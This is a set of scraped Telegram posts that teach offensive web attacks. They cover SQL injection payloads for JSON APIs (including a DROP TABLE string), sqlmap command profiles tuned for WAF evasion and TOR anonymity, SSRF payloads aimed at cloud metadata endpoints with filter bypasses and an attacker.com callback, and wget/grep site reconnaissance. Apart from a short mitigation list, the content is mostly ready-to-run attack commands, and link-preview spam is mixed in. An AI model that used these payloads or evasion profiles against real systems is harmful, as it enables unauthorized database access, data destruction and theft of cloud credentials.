A Real-World Example of Prototype Pollution Exploitation A hacker was testing a target and noticed that it didn’t properly validate user inputs, allowing multiple XSS vulnerabilities. This led them to wonder if they could directly manipulate the Prototype…
In the modern web, APIs are everywhere — powering everything from web apps and mobile apps to IoT devices. However, developers often make the same classic mistakes when handling user input, especially in JSON-based RESTful APIs.
SQL Injection (SQLi), a well-known vulnerability, is still relevant and can exist within APIs if input validation and query handling are not properly secured.
This article explores advanced techniques for identifying and exploiting SQL injection in APIs, particularly in JSON payloads. It is tailored for penetration testers and bug bounty hunters seeking to level up their API testing game.
━━━━━━━━━━━━━━━
•POST requests with JSON bodies
•GraphQL endpoints
•PUT/PATCH methods with nested objects
•Endpoints with dynamic filters or search queries
•Database-related error messages in API responses
•Unusual delays in response (time-based blind SQL)
•Reflection of user input in responses or logs
•Status code anomalies (e.g., 500 Internal Server Error)
━━━━━━━━━━━━━━━
Let’s say you’re testing the following API
POST /api/user/details HTTP/1.1
Host: vulnerable.site
Content-Type: application/json
{
"username": "admin"
}
Try payload injection:
{
"username": "' OR '1'='1"
}
🤖Or blind time-based:
{
"username": "' OR SLEEP(5)--"
}curl -X POST https://vulnerable.site/api/user/details \
-H "Content-Type: application/json" \
-d '{"username": "' OR 1=1 --"}'
{
"filter": {
"email": "admin@site.com' OR '1'='1"
}
}
Or nested objects:
{
"user": {
"id": "1'; DROP TABLE users;--"
}
}•Burp Suite (Pro): Use the Intruder or Repeater to fuzz JSON payloads.
•SQLMap with --data and --json flags:
sqlmap -u https://vulnerable.site/api/login \
--data '{"user":"admin","pass":"pass"}' \
--headers="Content-Type: application/json" \
--level=5 --risk=3 --batch
•Postman: Manual testing and injection
•Nuclei with custom templates
━━━━━━━━━━━━━━━━━━
Always analyze API docs (Swagger/OpenAPI) for parameter hints.
•Use Burp Collaborator for detecting out-of-band SQLi.
•Test for second-order injection, especially in multi-step flows.
•Try JSON-specific encoding, like:
•Unicode: \u0027 OR \u0031=\u0031
•Base64 in API params
━━━━━━━━━━━━━━━━━━
🛡️ Mitigation (For Blue Team Awareness)
Use parameterized queries / prepared statements
•Sanitize and validate input rigorously
•Apply WAF rules and anomaly detection for API behavior
•Implement rate limiting and access control
━━━━━━━━━━━━━━━━━━
SQL Injection is far from dead — it's just evolving. Modern APIs, especially those handling complex JSON bodies, often become attack vectors due to developer assumptions or insecure ORM usage. With the right mindset, tools, and techniques, ethical hackers can uncover and responsibly disclose serious vulnerabilities before attackers do.
Happy hacking and see you next time!
#CyberSecurity #MSSQL #EthicalHacking #json
#api
#JavaScriptSecurity
#WebSecurity
#BugBounty #EthicalHacking #CyberSecurity
#SecurityResearch #WebHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍2🥰1
Server-Side Request Forgery (SSRF) is a powerful vulnerability that occurs when a server fetches external resources based on user input. If exploited, it can lead to data leakage, access to internal systems, or even full infrastructure compromise.
Here’s a step-by-step guide to discovering and exploiting SSRF vulnerabilities:
━━━━━━━━━━━━━━━━━━
Start by locating areas where the application sends outbound requests. Common sources include:
If HTML or external content is processed, injecting a malicious URL can trick the server into making a request to your controlled endpoint.
Example:
<img src="http://attacker.com/payload"/>
━━━━━━━━━━━━━━━━━━
Test the server’s behavior by sending malformed URLs and observe the error responses:
These clues indicate whether the server is trying to make external requests.
Test Payloads:
http://invalid-url
http://example.local
http://127.0.0.1:9999
━━━━━━━━━━━━━━━━━━
Once confirmed, aim for internal IP ranges such as:
These often expose admin panels, internal APIs, or development services. Port scanning via SSRF is also possible by analyzing different response behaviors.
Example:
http://127.0.0.1:8000/admin
━━━━━━━━━━━━━━━━━━
In cloud environments (AWS, Azure, GCP), internal metadata endpoints may leak sensitive info like access keys and tokens.
Payloads:
http://169.254.169.254/latest/meta-data
http://169.254.169.254/metadata/instance?api-version=2021-02-01
Be sure to include necessary headers if required (e.g., Metadata: true for Azure).
━━━━━━━━━━━━━━━━━━
If filters are in place, use bypass techniques:
http://127%2E0%2E0%2E1
http://2130706433 (equals 127.0.0.1)
http://[::]
Pro Tip: Use DNS rebinding or SSRF chaining with redirect-capable endpoints.
━━━━━━━━━━━━━━━━━━
In blind SSRF cases, you won’t get visible feedback. Use external monitoring tools to detect interactions:
Example:
http://your-collaborator-url.com
Monitor for DNS or HTTP logs to confirm server-side interaction.
━━━━━━━━━━━━━━━━━━
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
Attacker
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
🔥5❤3👍1🥰1
Here’s a powerful list of 💻 SQLMap preconfigured profiles you can use for stealthy SQL injection, especially when dealing with WAFs, rate-limits, or intrusion detection systems (IDS/IPS).
These profiles combine SQLMap's most effective flags for stealth, evasion, and precision targeting.
✅ 1. Stealth Mode (WAF Bypass + Delay)
🔘 Use Case: Slow, stealthy testing to avoid WAF/IPS.
━━━━━━━━━━━━━━━━━━
✅ 2. Aggressive Mode with WAF Evasion
🔘 Use Case: For deeper exploitation when stealth is less critical.
━━━━━━━━━━━━━━━━━━
✅ 3. Blind Time-Based SQLi Detection
🔘 Use Case: For blind injections using SLEEP, benchmark, or pg_sleep.
━━━━━━━━━━━━━━━━━━
✅ 4. Obfuscated Payloads for Bypassing WAFs
🔘 Use Case: When facing intelligent WAFs that detect classic patterns.
━━━━━━━━━━━━━━━━━━
✅ 5. POST Parameter Injection with Custom Headers
🔘 Use Case: Bypassing login forms and tricking WAFs using header spoofing.
━━━━━━━━━━━━━━━━━━
✅ 6. Using TOR with WAF Evasion
🔘 Use Case: Anonymous testing through TOR while bypassing WAF.
━━━━━━━━━━━━━━━━━━
🔧 Recommended Tamper Scripts
💡 Bonus: Create a Custom Profile Alias
You can create a .sqlmap_profile file to reuse flags:
Then run:
That's all, friends!
Happy hacking and see you next time!🎁
#BugBounty
#ssrf
#sqli
#bypass
These profiles combine SQLMap's most effective flags for stealth, evasion, and precision targeting.
sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,between,charunicodeescape \
--delay=2 --timeout=10 \
--retries=5 \
--threads=1 \
--technique=BEUSTQ \
--level=3 --risk=2
━━━━━━━━━━━━━━━━━━
sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,charencode,unmagicquotes,versionedmorekeywords \
--level=5 --risk=3 \
--batch --threads=5 \
--technique=BEUSTQ
━━━━━━━━━━━━━━━━━━
sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,modsecurityversioned,between \
--technique=T \
--time-sec=5 \
--level=5 --risk=3 \
--batch
━━━━━━━━━━━━━━━━━━
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=charunicodeescape,randomcase,space2comment,versionedkeywords \
--random-agent \
--level=5 --risk=3 \
--threads=1 --delay=1 \
--batch
━━━━━━━━━━━━━━━━━━
sqlmap -u "http://target.com/login.php" \
--data="username=admin&password=1234" \
--method=POST \
--headers="X-Forwarded-For: 127.0.0.1" \
--random-agent \
--tamper=space2comment,charunicodeescape \
--level=5 --risk=3 \
--batch
━━━━━━━━━━━━━━━━━━
sqlmap -u "http://target.com/page.php?id=1" \
--tor --tor-type=SOCKS5 --check-tor \
--random-agent \
--delay=2 --timeout=10 \
--tamper=space2comment,charunicodeescape,modsecurityversioned \
--batch
━━━━━━━━━━━━━━━━━━
| Tamper Script | Description
| ---------------------- | -------------------------------------------
| `space2comment` | Replaces spaces with comments (`/**/`)
| `charunicodeescape` | Unicode-escapes payload characters
| `randomcase` | Randomizes keyword casing
| `between` | Obfuscates `WHERE` conditions
| `versionedkeywords` | Adds versioned comments before SQL keywords
| `equaltolike` | Replaces `=` with `LIKE`
| `unmagicquotes` | Bypasses magic quotes
| `modsecurityversioned` | Targets ModSecurity WAF bypass
You can create a .sqlmap_profile file to reuse flags:
# ~/.sqlmap_profile
--random-agent
--tamper=space2comment,charunicodeescape
--level=5
--risk=3
--threads=1
--delay=1
--timeout=10
--retries=3
--technique=BEUSTQ
Then run:
sqlmap -u "http://target.com/page.php?id=1" @~/.sqlmap_profile
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11🔥4🥰1
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent http://target.com
Analyze JavaScript files for hidden secrets, tokens, or API endpoints
Discover hidden or forgotten pages like /admin, /test, etc. 🕵️
Search HTML comments for sensitive dev notes
Browse and inspect the full site locally without triggering WAFs or rate limits
grep -Ri "<!--" target.com
# Developer comments
grep -Ri "api" target.com
# API endpoints
python3 LinkFinder.py -i index.html -o cli
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
#wget
Please open Telegram to view this post
VIEW IN TELEGRAM
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
🔥4❤2🥰2